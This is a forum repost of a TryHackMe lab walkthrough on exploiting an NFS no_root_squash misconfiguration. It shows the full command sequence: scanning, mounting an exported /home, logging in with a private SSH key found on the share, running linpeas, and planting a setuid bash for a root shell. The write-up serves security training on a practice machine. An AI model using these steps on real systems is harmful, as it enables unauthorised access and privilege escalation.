Sick Gaming
[Tut] Hacking Network File System (NFS) – A TryHackMe Walkthrough - Printable Version

+- Sick Gaming (https://www.sickgaming.net)
+-- Forum: Programming (https://www.sickgaming.net/forum-76.html)
+--- Forum: Python (https://www.sickgaming.net/forum-83.html)
+--- Thread: [Tut] Hacking Network File System (NFS) – A TryHackMe Walkthrough (/thread-100541.html)



[Tut] Hacking Network File System (NFS) – A TryHackMe Walkthrough - xSicKxBot - 01-08-2023

Hacking Network File System (NFS) – A TryHackMe Walkthrough

<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{&quot;align&quot;:&quot;left&quot;,&quot;id&quot;:&quot;1041581&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;top&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;1&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;Rate this post&quot;,&quot;legend&quot;:&quot;5\/5 - (1 vote)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;{score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/hacking-network-file-system-nfs-a-tryhackme-walkthrough/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FApudHe1bAVQ%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<h2>OBJECTIVE</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="852" height="567" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-34.png" alt="" class="wp-image-1041658" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-34.png 852w, https://blog.finxter.com/wp-content/uploads/2023/01/image-34-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-34-768x511.png 768w" sizes="(max-width: 852px) 100vw, 852px" /></figure>
</div>
<p>NFS (network file system) is a file system that enables file sharing between computers of different operating systems (Windows/Linux/Mac). </p>
<p>In <a href="https://tryhackme.com/room/networkservices2" target="_blank" rel="noreferrer noopener">this practice box</a> from TryHackMe, we will hack into NFS and exploit a misconfiguration (No-root Squash) to obtain root access and find our final <code>root.txt</code> flag.</p>
<h2>WHAT IS NO-ROOT SQUASH?</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="852" height="568" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-35.png" alt="" class="wp-image-1041662" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-35.png 852w, https://blog.finxter.com/wp-content/uploads/2023/01/image-35-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-35-768x512.png 768w" sizes="(max-width: 852px) 100vw, 852px" /></figure>
</div>
<p><strong>No-root Squash</strong> is an uncommon configuration (some might say a misconfiguration) on the NFS file system. </p>
<p>When enabled, it allows remote users to change file permissions on any file and also to add a <code>SETUID</code> bit to effectively run programs as the root user. Normally it is disabled to protect against hackers, and all root-created files are assigned to an unprivileged owner named <code>nfsnobody</code>.</p>
<p class="has-base-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f449.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Recommended</strong>: If you are interested in learning more technical details about how this works, I’d recommend <a rel="noreferrer noopener" href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/security_guide/s2-server-nfs-noroot" target="_blank">this article</a> on <code>no_root_squash</code> and other configuration options when using NFS.</p>
<h2>ENUMERATION</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="852" height="548" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-36.png" alt="" class="wp-image-1041663" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-36.png 852w, https://blog.finxter.com/wp-content/uploads/2023/01/image-36-300x193.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-36-768x494.png 768w" sizes="(max-width: 852px) 100vw, 852px" /></figure>
</div>
<p>We’ll start with a standard Nmap scan of all ports with the <code>-p-</code> flag:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nmap $targetIP -p-</pre>
<p>The scan shows an <code>nfs</code> service running on port. Let’s find out what directories are mountable with the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">showmount -e $targetIP</pre>
<p>(<code>-e</code> for exports)</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="523" height="388" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-29.png" alt="" class="wp-image-1041590" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-29.png 523w, https://blog.finxter.com/wp-content/uploads/2023/01/image-29-300x223.png 300w" sizes="(max-width: 523px) 100vw, 523px" /></figure>
</div>
<p>Let’s go ahead and mount the <code>/home</code> directory to our target machine. I’m using Parrot OS virtual machine with a Mate desktop environment running in Gnome Boxes. We can mount the <code>nfs</code> directory directly to our local filesystem with the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">mount -t nfs $targetIP:/home /mount</pre>
<p>(<code>-t</code> indicates filetype) </p>
<p>And now we can continue further enumeration by poking around the filesystem.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cd /mount
ls -la
</pre>
<p>We find a user folder in the home directory, <code>cappuccino</code> and a hidden directory <code>.ssh</code>. Inside the directory there is an <code>id_rsa</code> file that holds a private ssh key.</p>
<h2>INITIAL FOOTHOLD – USER CAPPUCCINO </h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="852" height="568" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-37.png" alt="" class="wp-image-1041665" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-37.png 852w, https://blog.finxter.com/wp-content/uploads/2023/01/image-37-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-37-768x512.png 768w" sizes="(max-width: 852px) 100vw, 852px" /></figure>
</div>
<p>After copying the <code>id_rsa</code> over to our target machine, we can ssh into cappuccino’s account with this command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh -i id_rsa cappuccino@$targetIP</pre>
<h2>ENUMERATING PRIVILEGE ESCALATION ATTACK VECTORS WITH LINPEAS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="852" height="567" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-38.png" alt="" class="wp-image-1041666" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-38.png 852w, https://blog.finxter.com/wp-content/uploads/2023/01/image-38-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-38-768x511.png 768w" sizes="(max-width: 852px) 100vw, 852px" /></figure>
</div>
<p>Now that we have our initial foothold, we can grab a copy of the well-known script <code>linpeas.sh</code> from <a rel="noreferrer noopener" href="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS" target="_blank">the official git repo</a> and use it to automate the enumeration of attack vectors for privilege escalation on the target machine. We’ll navigate to the <code>/mount</code> folder and use the command <code>wget</code> on our attack machine for this:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh </pre>
<p>Before running the sh program from our target machine, we need to add execute permissions to the file from our attack machine. </p>
<p><em>The beauty of mounting NFS file systems in Linux is evident here as we can easily add permissions to <code>linpeas.sh</code> from our attack machine to set up the program to be executable on the target machine</em>.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">chmod +x linpeas.sh</pre>
<p>Now that <code>linpeas.sh</code> is located in the <code>/home</code> folder of the target machine, we can run it to start the automated enumeration:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">./linpeas.sh</pre>
<p>This will dump a long text file full of details about the target machine. The most interesting things for privilege escalation are highlighted in yellow with red text. </p>
<p>Scrolling through the results, we quickly find the <code>no_root_squash</code> listed under NFS. We will now move forward and exploit this misconfiguration, allowing us to escalate privileges to the root user.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="935" height="380" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-30.png" alt="" class="wp-image-1041591" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-30.png 935w, https://blog.finxter.com/wp-content/uploads/2023/01/image-30-300x122.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-30-768x312.png 768w" sizes="(max-width: 935px) 100vw, 935px" /></figure>
</div>
<h2>EXPLOITING NO_ROOT_SQUASH</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="852" height="567" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-39.png" alt="" class="wp-image-1041668" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-39.png 852w, https://blog.finxter.com/wp-content/uploads/2023/01/image-39-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2023/01/image-39-768x511.png 768w" sizes="(max-width: 852px) 100vw, 852px" /></figure>
</div>
<p>First, let’s grab the bash executable for Ubuntu Server 18.04 from the <a rel="noreferrer noopener" href="https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash" target="_blank">link</a> on TryHackMe.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">Sudo wget https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash</pre>
<p>Now we add the <code>SETUID</code> bit to the file bash and make it executable. This is the key to gaining root access with <code>no_root_squash</code>.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo chmod +sx bash</pre>
<p>Running bash now from our target machine doesn’t seem to change us to the root user yet.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">./bash</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="666" height="239" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-31.png" alt="" class="wp-image-1041592" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-31.png 666w, https://blog.finxter.com/wp-content/uploads/2023/01/image-31-300x108.png 300w" sizes="(max-width: 666px) 100vw, 666px" /></figure>
</div>
<p>The final trick we need to use is to enable persistence mode with the flag <code>-p</code></p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="366" height="136" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-32.png" alt="" class="wp-image-1041594" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-32.png 366w, https://blog.finxter.com/wp-content/uploads/2023/01/image-32-300x111.png 300w" sizes="(max-width: 366px) 100vw, 366px" /></figure>
</div>
<p>If you liked this tutorial, you’d probably love my video walkthrough as well:</p>
<p class="has-base-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f449.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Recommended Tutorial</strong>: <a rel="noreferrer noopener" href="https://blog.finxter.com/tryhackme-walkthrough-wonderland/" data-type="post" data-id="892288" target="_blank">Alice in Wonderland — TryHackMe</a></p>
</div>


https://www.sickgaming.net/blog/2023/01/07/hacking-network-file-system-nfs-a-tryhackme-walkthrough/